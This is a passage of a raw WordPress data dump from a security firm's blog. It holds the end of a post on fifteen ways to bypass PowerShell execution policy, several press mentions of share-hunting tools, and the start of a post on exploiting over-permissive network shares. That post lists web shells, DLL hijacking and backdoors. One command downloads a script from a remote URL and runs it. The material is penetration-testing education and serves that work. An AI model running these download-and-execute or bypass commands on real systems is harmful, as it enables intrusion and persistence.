2. Echo the Script and Pipe it to PowerShell Standard In

Simply ECHO your script into PowerShell standard input. This technique does not result in a configuration change or require writing to disk.

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
Powershell Bypass - Script Echo

3. Read Script from a File and Pipe to PowerShell Standard In

Use the Windows "type" command or PowerShell "Get-Content" command to read your script from the disk and pipe it into PowerShell standard input. This technique does not result in a configuration change, but does require writing your script to disk. However, you could read it from a network share if you're trying to avoid writing to the disk.

Example 1: Get-Content PowerShell command

Get-Content .runme.ps1 | PowerShell.exe -noprofile -

Powershell Bypass - Get-Content Command

Example 2: Type command

TYPE .runme.ps1 | PowerShell.exe -noprofile -
Powershell Bypass - Type command

4. Download Script from URL and Execute with Invoke Expression

This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn't result in any configuration changes. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"
Powershell Bypass - Execute with Invoke Expression

5. Use the Command Switch

This technique is very similar to executing a script via copy and paste, but it can be done without the interactive console. It's nice for simple script execution, but more complex scripts usually end up with parsing errors. This technique does not result in a configuration change or require writing to disk.

Example 1: Full command

Powershell -command "Write-Host 'My voice is my passport, verify me.'"

Powershell Bypass - Command Switch

Example 2: Short command

Powershell -c "Write-Host 'My voice is my passport, verify me.'"

It may also be worth noting that you can place these types of PowerShell commands into batch files and place them into autorun locations (like the all users startup folder) to help during privilege escalation.

6. Use the EncodeCommand Switch

This is very similar to the "Command" switch, but all scripts are provided as a Unicode/base64 encoded string. Encoding your script in this way helps to avoid all those nasty parsing errors that you run into when using the "Command" switch. This technique does not result in a configuration change or require writing to disk. The sample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for reducing the size of the encoded commands if they start getting too long.

Example 1: Full command

$command = "Write-Host 'My voice is my passport, verify me.'" 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -EncodedCommand $encodedCommand
Powershell Bypass - EncodeCommand Switch

Example 2: Short command using encoded string

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

7. Use the Invoke-Command Command

This is a fun option that I came across on the Obscuresec blog. It’s typically executed through an interactive PowerShell console or one liner using the “Command” switch, but the cool thing is that it can be used to execute commands against remote systems where PowerShell remoting has been enabled. This technique does not result in a configuration change or require writing to disk.

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
Powershell Bypass - Invoke-Command Command

Based on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote computer and apply it to the local computer.

invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. Use the Invoke-Expression Command

This is another one that's typically executed through an interactive PowerShell console or one liner using the "Command" switch. This technique does not result in a configuration change or require writing to disk. Below I've listed are a few common ways to use Invoke-Expression to bypass the execution policy.

Example 1: Full command using Get-Content

Get-Content .runme.ps1 | Invoke-Expression
Powershell Bypass - Invoke-Expression Command

Example 2: Short command using Get-Content

GC .runme.ps1 | iex

9. Use the "Bypass" Execution Policy Flag

This is a nice flag added by Microsoft that will bypass the execution policy when you're executing scripts from a file. When this flag is used Microsoft states that "Nothing is blocked and there are no warnings or prompts". This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
ExecutionPolicy Bypass

10. Use the "Unrestricted" Execution Policy Flag

This similar to the "Bypass" flag. However, when this flag is used Microsoft states that it "Loads all configuration files and runs all scripts. If you run an unsigned script that was downloaded from the Internet, you are prompted for permission before it runs." This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
Powershell Bypass - Swap out the AuthorizationManager

11. Use the "Remote-Signed" Execution Policy Flag

Create your script then follow the tutorial written by Carlos Perez to sign it. Finally,run it using the command below:

PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

This is one of the more creative approaches. The function below can be executed via an interactive PowerShell console or by using the "command" switch. Once the function is called it will swap out the "AuthorizationManager" with null. As a result, the execution policy is essentially set to unrestricted for the remainder of the session. This technique does not result in a persistant configuration change or require writing to disk. However, it the change will be applied for the duration of the session.

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} 

Disable-ExecutionPolicy  .runme.ps1
Powershell Bypass - Process Scope

13. Set the ExcutionPolicy for the Process Scope

As we saw in the introduction, the execution policy can be applied at many levels. This includes the process which you have control over. Using this technique the execution policy can be set to unrestricted for the duration of your Session. Also, it does not result in a configuration change, or require writing to the disk.

Set-ExecutionPolicy Bypass -Scope Process
Powershell Bypass - Set the ExcutionPolicy

14. Set the ExcutionPolicy for the CurrentUser Scope via Command

This option is similar to the process scope, but applies the setting to the current user's environment persistently by modifying a registry key. Also, it does not result in a configuration change, or require writing to the disk.

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
CurrentUser Scope via the

15. Set the ExcutionPolicy for the CurrentUser Scope via the Registry

In this example I've shown how to change the execution policy for the current user's environment persistently by modifying a registry key directly.

HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Powershell Bypass – Folder Structure

Wrap Up Summary

I think the theme here is that the execution policy doesn’t have to be a hurdle for developers, admins, or penetration testing. Microsoft never intended it to be a security control. Which is why there are so many options for bypassing it. Microsoft was nice enough to provide some native options and the security community has also come up with some really fun tricks. Thanks to all of those people who have contributed through blogs and presentations. To the rest, good luck in all your PowerShell adventures and don't forget to hack responsibly. ;)

Looking for a strategic partner to critically test your Windows systems? Explore NetSPI’s network penetration testing services.

References

[post_title] => 15 Ways to Bypass the PowerShell Execution Policy [post_excerpt] => By default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. In this blog I’ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 15-ways-to-bypass-the-powershell-execution-policy [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:58 [post_modified_gmt] => 2023-01-23 21:09:58 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1107 [menu_order] => 162 [post_type] => post [post_mime_type] => [comment_count] => 23 [filter] => raw ) [8] => WP_Post Object ( [ID] => 28916 [post_author] => 17 [post_date] => 2022-11-29 15:15:00 [post_date_gmt] => 2022-11-29 21:15:00 [post_content] =>

On November 29, both Vice President of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. Read the preview below or view it online.

+++

What will the New Year bring in cyberspace? Here's a roundup of some of the top security industry forecasts, trends and cybersecurity predictions for 2023. Where do things go from here?

Read on as 18 industry leaders in the security space come together to provide their insights into how the cybersecurity industry will shake out in 2023.

NetSPI: Scott Sutherland, VP of Research - Can DTL Help Stop Software Supply Chain Attacks? 

"Adoption of distributed ledger technology (DTL) is still in its infancy and we'll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several "supply chain compromises'' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem."

+++

NetSPI: Nick Landers, VP of Research - By the end of next year every major financial institution will have announced adoption of Blockchain technology

"There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains. 

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven't already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts.Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was "secure by default", think again. Just like cloud platform adoption, the promises of "secure by default" will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech."

You can read the full article at VMblog!

[post_title] => VMBlog: 18 Security Leaders Come Together to Share Their 2023 Predictions [post_excerpt] => On November 29, VPs of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => vmblog-security-leaders-share-2023-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:01 [post_modified_gmt] => 2023-01-23 21:10:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28916 [menu_order] => 169 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 28201 [post_author] => 17 [post_date] => 2022-08-10 16:32:00 [post_date_gmt] => 2022-08-10 21:32:00 [post_content] =>

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Dark Reading article called New Open Source Tools Launched for Adversary Simulation. Read the preview below or view it online.

+++

Network shares in Active Directory environments configured with excessive permissions pose serious risks to the enterprise in the form of data exposure, privilege escalation, and ransomware attacks. Two new open source adversary simulation tools PowerHuntShares and PowerHunt help enterprise defenders discover vulnerable network shares and manage the attack surface.

The tools will help defense, identity and access management (IAM), and security operations center (SOC) teams streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments, NetSPI's senior director Scott Sutherland wrote on the company blog. Sutherland developed these tools.

PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. The PowerHuntShares tool addresses the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.

"PowerHuntShares will inventory SMB share ACLs configured with 'excessive privileges' and highlight 'high risk' ACLs [access control lists]," Sutherland wrote.

PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. The tool automates the collection of artifacts at scale using PowerShell remoting and perform initial analysis. 

You can read the full article at Dark Reading!

[post_title] => Dark Reading: New Open Source Tools Launched for Adversary Simulation [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Dark Reading article called New Open Source Tools Launched for Adversary Simulation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dark-reading-open-source-tools-for-adversary-simulation [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:21 [post_modified_gmt] => 2023-01-23 21:10:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28201 [menu_order] => 218 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 28194 [post_author] => 17 [post_date] => 2022-08-10 12:56:00 [post_date_gmt] => 2022-08-10 17:56:00 [post_content] =>

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Open Source For You article called New Open Source Tools From NetSPI Address Information Security Issues. Read the preview below or view it online.

+++

Two new open source solutions for identity and access management (IAM) and security operations centre (SOC) groups have been made available by NetSPI, a business that specialises in enterprise penetration testing and attack surface management. Information security teams will benefit from these tools, PowerHuntShares and PowerHunt, which will help them find weak network shares and enhance detections in general.

PowerHuntShares intends to lessen the problems created by excessive powers in corporate systems, such as data disclosure, privilege escalation, and ransomware assaults. On Active Directory domain-joined PCs, the programme detects, examines, and reports excessive share permissions linked to their respective SMB shares.

A modular threat hunting platform called PowerHunt finds dangers in a variety of target contexts as well as targets-specific oddities and outliers. This detection is based on artefacts from popular MITRE ATT&CK techniques. The collecting of these artefacts is automated using PowerShell remoting, and initial analysis is then performed. Along with other tools and procedures, PowerHunt also creates simple-to-use.csv files for improved triage and analysis.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

[post_title] => Open Source For You: New Open Source Tools From NetSPI Address Information Security Issues [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Open Source For You article called New Open Source Tools From NetSPI Address Information Security Issues. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => open-source-for-you-new-open-source-tools-address-information-security-issues [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:21 [post_modified_gmt] => 2023-01-23 21:10:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28194 [menu_order] => 219 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 28195 [post_author] => 17 [post_date] => 2022-08-10 09:28:00 [post_date_gmt] => 2022-08-10 14:28:00 [post_content] =>

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Help Net Security article called NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares. Read the preview below or view it online.

+++

At Black Hat USA 2022NetSPI has unveiled two new open-source tools for the information security community: PowerHuntShares and PowerHunt.

These new adversary simulation tools were developed by NetSPI’s Senior Director, Scott Sutherland, to help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections.

  • PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. This capability helps address the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.
  • PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. PowerHunt automates the collection of artifacts at scale using PowerShell remoting and perform initial analysis. It can also output easy to consume .csv files so that additional triage and analysis can be done using other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

[post_title] => Help Net Security: NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Help Net Security article called NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => help-net-security-open-source-tools [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28195 [menu_order] => 220 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 28196 [post_author] => 17 [post_date] => 2022-08-09 13:06:00 [post_date_gmt] => 2022-08-09 18:06:00 [post_content] =>

On August 9, NetSPI Senior Director Scott Sutherland was featured in the Database Trends and Applications article called NetSPI’s Latest Open-Source Tools Confront Information Security Issues. Read the preview below or view it online.

+++

NetSPI, an enterprise penetration testing and attack surface management company, is releasing two new open-source tools for identity and access management (IAM) and security operations center (SOC) groups. These tools, PowerHuntShares and PowerHunt, will aid information security teams discover vulnerable network shares and improve detections overall.

PowerHuntShares aims to elevate the pains of data exposure, privilege escalation, and ransomware attacks in company systems caused by excessive privileges. The tool inventories, analyzes, and reports excessive share permissions associated with their respective SMB shares on Active Directory domain joined computers.

PowerHunt is a modular threat hunting framework that locates risks across target environments, as well as identifies target-specific anomalies and outliers. This detection is based on artifacts from prevalent MITRE ATT&CK techniques, whose collection is automated using PowerShell remoting and perform initial analysis. PowerHunt also produces easy to consume .csv files for increased triage and analysis, among other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

For more information, please visit https://www.netspi.com/.

[post_title] => Database Trends and Applications: NetSPI’s Latest Open-Source Tools Confront Information Security Issues [post_excerpt] => On August 9, NetSPI Senior Director Scott Sutherland was featured in the Database Trends and Applications called NetSPI’s Latest Open-Source Tools Confront Information Security Issues. Read the preview below or view it online. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => open-source-tools-confront-information-security-issues [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28196 [menu_order] => 222 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 28193 [post_author] => 17 [post_date] => 2022-08-09 12:21:00 [post_date_gmt] => 2022-08-09 17:21:00 [post_content] =>

On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. Read the preview below or view it online.

+++

Preventing and mitigating cyberattacks is a day-to-day — sometimes hour-to-hour — is a massive endeavor for enterprises. New, more advanced techniques are revealed constantly, especially with the rise in ransomware-as-a-service, crime syndicates and cybercrime commoditization. Likewise, statistics are seemingly endless, with a regular churn of new, updated reports and research studies revealing worsening conditions. 

According to Fortune Business Insights, the worldwide information security market will reach just around $376 billion in 2029. And, IBM research revealed that the average cost of a data breach is $4.35 million.

The harsh truth is that many organizations are exposed due to common software, hardware or organizational process vulnerabilities — and 93% of all networks are open to breaches, according to another recent report

Cybersecurity must therefore be a team effort, said Scott Sutherland, senior director at NetSPI, which specializes in enterprise penetration testing and attack-surface management. 

New open-source discovery and remediation tools

The company today announced the release of two new open-source tools for the information security community: PowerHuntShares and PowerHunt. Sutherland is demoing both at Black Hat USA this week. 

These new tools are aimed at helping defense, identity and access management (IAM) and security operations center (SOC) teams discover vulnerable network shares and improve detections, said Sutherland. 

They have been developed — and released in an open-source capacity — to “help ensure our penetration testers and the IT community can more effectively identify and remediate excessive share permissions that are being abused by bad actors like ransomware groups,” said Sutherland. 

He added, “They can be used as part of a regular quarterly cadence, but the hope is they’ll be a starting point for companies that lacked awareness around these issues before the tools were released.” 

Vulnerabilities revealed (by the good guys)

The new PowerHuntShares capability inventories, analyzes and reports excessive privilege assigned to server message block (SMB) shares on Microsoft’s Active Directory (AD) domain-joined computers. 

SMB allows applications on a computer to read and write to files and to request services from server programs in a computer network.

NetSPI’s new tool helps address risks of excessive share permissions in AD environments that can lead to data exposure, privilege escalation and ransomware attacks within enterprise environments, explained Sutherland. 

“PowerHuntShares is focused on identifying shares configured with excessive permissions and providing data insight to understand how they are related to each other, when they were introduced into the environment, who owns them and how exploitable they are,” said Sutherland. 

For instance, according to a recent study from cybersecurity company ExtraHop, SMB was the most prevalent protocol exposed in many industries: 34 out of 10,000 devices in financial services; seven out of 10,000 devices in healthcare; and five out of 10,000 devices in state, local and education (SLED).

You can read the full article at VentureBeat!

[post_title] => VentureBeat: NetSPI rolls out 2 new open-source pen-testing tools at Black Hat [post_excerpt] => On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => venturebeat-new-open-source-pentesting-tools [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:23 [post_modified_gmt] => 2023-01-23 21:10:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28193 [menu_order] => 223 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 28175 [post_author] => 17 [post_date] => 2022-08-09 08:00:00 [post_date_gmt] => 2022-08-09 13:00:00 [post_content] =>

Introduction 

In this blog, I’ll explain how to quickly inventory, exploit, and remediate network shares configured with excessive permissions at scale in Active Directory environments. Excessive share permissions represent a risk that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments. So, I’ll also be exploring why network shares configured with excessive permissions are still plaguing most environments after 20 years of mainstream vulnerability management and penetration testing.

Finally, I’ll share a new open-source tool called PowerHuntShares that can help streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments. This content is also available in a presentation format here. Or, if you’d like to hear me talk about this topic, check out our webinar, How to Evaluate Active Directory SMB Shares at Scale.

This should be interesting to people responsible for managing network share access in Active Directory environments (Identity and access management/IAM teams) and the red team/penetration testers tasked with exploiting that access. 

TLDR; We can leverage Active Directory to help create an inventory of systems and shares. Shares configured with excessive permissions can lead to remote code execution (RCE) in a variety of ways, remediation efforts can be expedited through simple data grouping techniques, and malicious share scanning can be detected with a few common event IDs and a little correlation (always easier said than done).

Table of Contents: 

The Problem(s)
Network Share Permissions Inheritance Blind Spots
Network Share Inventory
Network Share Exploitation
Network Share Remediation
Introducing PowerHuntShares
Wrap Up

The Problem(s) 

If only it were just one problem. I don’t know a penetration tester that doesn’t have a war story involving unauthorized network share access. In the real world, that story typically ends with the deployment of ransomware and double extortion. That’s why it’s important we try to understand some of the root causes behind this issue. Below is a summary of the root causes that often lead to massive network share exposure in most Active Directory environments. 

Broken Asset Management 

Tracking live systems in enterprise environments is difficult and tracking an ever-changing share inventory and owners is even more difficult. Even if the Identity and Access Management (IAM) team finds a network share through discovery, it begs the questions:

  1. Who owns it?
  2. What applications or business processes does it support?
  3. Can we remove high risk Access Control Entries (ACE)?
  4. Can we remove the share all together?

Most of those questions can be answered if you have a functioning Configuration Management Database (CMDB). Unfortunately, not everyone does.

Broken Vulnerability Management 

Many vulnerability management programs were never built to identify network share configurations that provide unauthorized access to authenticated domain users. Much of their focus has been on identifying classic vulnerabilities (missing patches, weak passwords, and application issues) and prioritizing efforts around vulnerabilities that don’t require authentication, which is of course not all bad.

However, based on my observations, the industry has only taken a deep interest in the Active Directory ecosystem in the last five years. This seems to be largely due to increased exposure and awareness of Active Directory (AD) attacks which are heavily dependent on configurations and not missing patches.

I’m also not saying IAM teams haven’t been working hard to do their jobs, but in many cases, they get bogged down in what equates to group management and forget to (or don’t have time to) look at the actual assets that global/common groups have access to. That is a deep well, but today’s focus is on the network shares.

Penetration testers have always known shares are a risk, but implementing, managing, and evaluating least privilege in Active Directory environments is a non-trivial challenge. Even with increased interest in the security community, very few solutions can effectively inventory and evaluate share access for an entire Active Directory domain (or multiple domains). 

Based on my experience, very few organizations perform authenticated vulnerability scans to begin with, but even those that do seem to lack findings for common excessive privileges, inherited permissions, and distilled summary data for the environment that provides the insights that most IAM teams need to make good decisions. There has been an overreliance on those types of tools for a long time because many companies have the impression that they provide more coverage than they do regarding network share permissions. 

In short, good asset inventory and attack surface management paves the way for better vulnerability management coverage – and many companies aren’t quite there yet. 

Not Considering Segmentation Boundaries 

Most large environments have host, network, and Active Directory domain boundaries that need to be considered when performing any type of authenticated scanning or agent deployment. Companies trying to accurately inventory and evaluate network shares often miss things because they do not consider the boundaries isolating their assets. Make sure to work within those boundaries when evaluating assets. 

The Cloud is Here!

The cloud is here, and it supports all kinds of fantastic file storage mediums, but that doesn’t mean that on premise network shares disappear. Companies need to make sure they are still looking backward as they continue to look forward regarding security controls on file shares. For many companies, it may be the better part of a decade before they can migrate the bulk of their file storage infrastructure into their favorite floating mass of condensed water vapor – you know, the cloud. 😜

Misunderstanding NTFS and Share Permissions 

There are a lot of bad practices related to share permission management that have gotten absorbed into IT culture over the years simply because people don’t understand how they work. One of the biggest contributors to excessive share permissions is privilege inheritance through native nested group memberships. This issue is not limited to network shares either. We have been abusing the same privilege inheritance issues for over a decade to get access to SQL Server Instances. In the next sections, I’ll provide an overview of the issue and how it can be exploited in the context of network shares.

Network Share Permissions Inheritance Blind Spots 

A network share is just a medium for making local files available to remote users on the network, but two sets of permissions control a remote user’s access to the shared files. To understand the privilege inheritance problem, it helps to do a quick refresher on how NTFS and share permissions work together on Windows systems. Let’s explore the basics. 

NTFS Permissions 

  • Used to control access to the local NTFS file system 
  • Can affect local and remote users 

Share Permissions 

  • Used to control access to shared files and folders 
  • Only affects remote users 

In short, from a remote user perspective, network share permissions (remote) are reviewed first, then NTFS permissions (local) are reviewed second, but the most restrictive permission always wins regardless. Below is a simple example showing that John has Full Control permissions on the share, but only Read permissions on the associated local folder. Most restrictive wins, so John is only provided read access to the files made available remotely through the shared folder.

A diagram of NTFS Permissions and Share Permissions showcasing that the most restrictive permission wins.

So those are the basics. The big idea being that the most restrictive ACL wins. However, there are some nuances that have to do with local groups that inherit Domain Groups. To get our heads around that, let’s touch briefly on the affected local groups. 

Everyone

The everyone group provides all authenticated and anonymous users with access in most configurations. This group is overused in many environments and often results in excessive privilege. 

Builtin\Users 

New local users are added to it by default. When the system is not joined to a domain it operates as you would expect it to. 

Authenticated Users

This group is nested in the Builtin\Users group. When a system is not joined to the domain, it doesn’t do much in the way of influencing access. However, when a system is joined to an Active Directory domain, Authenticated Users implicitly includes the “Domain Users” and “Domain Computers” groups. For example, an IT administrator may think they’re only providing remote share access to the Builtin\Users group, when in fact they are giving it to everyone on the domain. Below is a diagram to help illustrates this scenario.

Builtin\Users group includes Domain Users when domain joined.

The lesson here is that a small misunderstanding around local and domain group relationships can lead to unauthorized access and potential risk. The next section will cover how to inventory shares and their Access-Control Lists (ACLs) so we can target and remediate them.

Network Share Inventory 

As it turns out, getting a quick inventory of your domain computers and associated shares isn’t that hard thanks to several native and open-source tools. The trick is to grab enough information to answer those who, what, where, when, and how questions needed for remediation efforts.
The discovery of shares and permissions boils down to a few basic steps: 

  1. Query Active Directory via Lightweight Directory Access Protocol (LDAP) to get a list of domain computers. PowerShell commands like Get-AdComputer (Active Directory PowerShell Module) and Get-DomainComputer (PowerSploit) can help a lot there.
  2. Confirm connectivity to those computers on TCP port 445. Nmap is a free and easy-to-use tool for this purpose. There are also several open-source TCP port scanning scripts out there if you want to stick with PowerShell.
  3. Query for shares, share permissions, and other information using your preferred method. PowerShell tools like Get-SMBShare, Get-SmbShareAccess, Get-ACL, and Get-ObjectAcl (PowerSploit) are quite helpful.
  4. Other information that will help remediation efforts later includes the folder owner, file count, file listing, file listing hash, and computer IP address. You may also find some of that information in your company’s CMDB. PowerShell commands like Get-ChildItem and Resolve-DnsNameSome can also help gather some of that information.

PowerHuntShares can be used to automate the tasks above (covered in the last section), but regardless of what you use for discovery, understanding how unauthorized share access can be abused will help your team prioritize remediation efforts.

Network Share Exploitation 

Network shares configured with excessive permissions can be exploited in several ways, but the nature of the share and specific share permissions will ultimately dictate which attacks can be executed. Below, I’ve provided an overview of some of the most common attacks that leverage read and write access to shares to help get you started. 

Read Access Abuse 

Ransomware and other threat actors often leverage excessive read permissions on shares to access sensitive data like Personal Identifiable Information (PII) or intellectual property (source code, engineering designs, investment strategies, proprietary formulas, acquisition information, etc.) that they can exploit, sell, or extort your company with. Additionally, we have found during penetration tests that passwords are commonly stored in cleartext and can be used to log into databases and servers. This means that in some cases, read access to a share can end in RCE.

Below is a simple example of how excessive read access to a network share can result in RCE: 

  1. The attacker compromises a domain user.
  2. The attacker identifies a shared folder for a web root, code backup, or dev ops directory.
  3. The attacker identifies passwords (often database connection strings) stored in cleartext.
  4. The attacker uses the database password to connect to the database server.
  5. The attacker uses the native database functionality to obtain local administrative privileges to the database server’s operating system.
  6. The attacker leverages shared database service account to access other database servers. 

Below is a simple illustration of that process: 

A 6-step process of how excessive read access to a network share can result in remote code execution (RCE).

Write Access Abuse 

Write access provides all the benefits of read access with the bonus of being able to add, remove, modify, and encrypt files (like Ransomware threat actors). Write access also offers more potential to turn share access into RCE. Below is a list of ten of the more common RCE options: 

  1. Write a web shell to a web root folder, which can be accessed via the web server.
  2. Replace or modify application EXE and DLL files to include a backdoor.
  3. Write EXE or DLL files to paths used by applications and services that are unquoted.
  4. Write a DLL to application folders to perform DLL hijacking. You can use Koppeling, written by NetSPI’s very own Director of Research Nick Landers.
  5. Write a DLL and config file to application folders to perform appdomain hijacking for .net applications.
  6. Write an executable or script to the “All Users” Startup folder to launch them at the next logon.
  7. Modify files executed by scheduled tasks.
  8. Modify the PowerShell startup profile to include a backdoor.
  9. Modify Microsoft office templates to include a backdoor.
  10. Write a malicious LNK file to capture or relay the NetNTLM hashes. 

You may have noticed that many of the techniques I listed are also commonly used for persistence and lateral movement, which is a great reminder that old techniques can have more than one use case. 

Below is a simple diagram that attempts to illustrate the basic web shell example.

  1. The attacker compromises a domain user.
  2. The attacker scans for shares, finds a wwwroot directory, and uploads a web shell. The wwwroot directory stores all the files used by the web application hosted on the target IIS server. So, you can think of the web shell as something that extends the functionality of the published web application.
  3. Using a standard web browser, the attacker can now access the uploaded web shell file hosted by the target IIS web server.
  4. The attacker uses the web shell access to execute commands on the operating systems as the web server service account.
  5. The web server service account may have additional privileges to access other resources on the network.
A 5-step diagram showing RCE using a web shell.

Below is another simplified diagram showing the generic steps that can be used to execute the attacks from my top 10 list. Let’s pay attention to the C$ share being abused. The C$ share is a default hidden share in Windows that should not be accessible to standard domain users. It maps to the C drive, which typically includes all the files on the system. Unfortunately, devOops, application deployments, and single user misconfigurations accidentally (or intently) make the C$ share available to all domain users in more environments than you might think. During our penetration test, we perform full SMB share audits for domain joined systems, and we have found that we end up with write access to a C$ share more than half the time.

A simplified diagram based on the list of 10 common remote code execution (RCE) options.

Network Share Remediation 

